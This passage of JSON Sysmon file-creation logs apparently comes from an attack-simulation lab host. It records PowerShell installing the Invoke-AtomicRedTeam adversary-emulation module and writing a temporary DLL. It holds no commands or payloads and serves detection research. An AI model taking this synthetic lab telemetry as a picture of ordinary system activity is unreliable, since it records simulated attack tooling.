05:52:21.092","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-TargetInfo.ps1","CreationUtcTime":"2020-08-01 05:52:21.092","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4611,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.092\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-CheckPrereqs.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.092","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.092","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-CheckPrereqs.ps1","CreationUtcTime":"2020-08-01 05:52:21.092","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4612,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.092\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-ExecuteCommand.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.092","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.092","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-ExecuteCommand.ps1","CreationUtcTime":"2020-08-01 05:52:21.092","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4613,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.092\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-KillProcessTree.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.092","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.092","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-KillProcessTree.ps1","CreationUtcTime":"2020-08-01 05:52:21.092","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4614,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.108\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-Process.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.108","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.108","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-Process.ps1","CreationUtcTime":"2020-08-01 05:52:21.108","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4615,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.108\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Replace-InputArgs.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.108","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.108","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Replace-InputArgs.ps1","CreationUtcTime":"2020-08-01 05:52:21.108","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4616,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.108\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Show-Details.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.108","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.108","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Show-Details.ps1","CreationUtcTime":"2020-08-01 05:52:21.108","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4617,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.108\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-ExecutionLog.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.108","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.108","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-ExecutionLog.ps1","CreationUtcTime":"2020-08-01 05:52:21.108","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4618,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.108\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-KeyValue.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.108","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.108","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-KeyValue.ps1","CreationUtcTime":"2020-08-01 05:52:21.108","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4619,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.108\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-PrereqResults.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.108","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.108","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-PrereqResults.ps1","CreationUtcTime":"2020-08-01 05:52:21.108","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4620,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.108\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Get-AtomicTechnique.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.108","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.108","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Get-AtomicTechnique.ps1","CreationUtcTime":"2020-08-01 05:52:21.108","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4621,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.108\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-AtomicTest.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.108","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.108","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-AtomicTest.ps1","CreationUtcTime":"2020-08-01 05:52:21.108","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4622,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.108\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-MalDoc.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.108","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.108","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-MalDoc.ps1","CreationUtcTime":"2020-08-01 05:52:21.108","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4623,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.124\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-WebRequestVerifyHash.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.124","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.124","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-WebRequestVerifyHash.ps1","CreationUtcTime":"2020-08-01 05:52:21.124","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4624,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.124\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\New-Atomic.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.124","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.124","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\New-Atomic.ps1","CreationUtcTime":"2020-08-01 05:52:21.124","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4625,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.124\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Start-AtomicGUI.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.124","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.124","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Start-AtomicGUI.ps1","CreationUtcTime":"2020-08-01 05:52:21.124","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4626,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.124\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicredteam.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.124","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.124","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicredteam.ps1","CreationUtcTime":"2020-08-01 05:52:21.124","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4627,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.124\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicsfolder.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.124","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.124","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicsfolder.ps1","CreationUtcTime":"2020-08-01 05:52:21.124","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4628,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:21.358\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.dll\r\nCreationUtcTime: 2020-08-01 05:52:21.358","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:21.358","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.dll","CreationUtcTime":"2020-08-01 05:52:21.358","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4629,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:21.358","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.cmdline","CreationUtcTime":"2020-08-01 05:52:21.358","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
